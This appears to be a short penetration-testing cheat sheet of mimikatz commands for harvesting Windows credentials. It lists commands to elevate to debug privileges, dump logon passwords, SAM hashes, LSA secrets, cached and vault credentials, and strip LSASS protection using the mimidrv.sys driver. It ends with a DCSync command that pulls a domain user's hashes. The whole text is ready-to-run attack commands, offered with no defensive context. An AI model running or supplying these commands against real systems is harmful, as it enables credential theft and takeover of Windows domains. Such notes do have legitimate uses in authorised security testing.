Skip to main content

mimikatz

Cached Credentials

debug privileges

token::elevate
privilege::debug

hashdump logged on users

sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
sekurlsa::msv
sekurlsa::credman
vault::cred /patch
lsadump::cache
lsadump::lsa /inject
sekurlsa::ekeys

On error

Transfer mimidrv.sys

!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords

DC Sync

debug privileges

privilege::debug

hashdump logged on users

lsadump::dcsync /user:corp\dave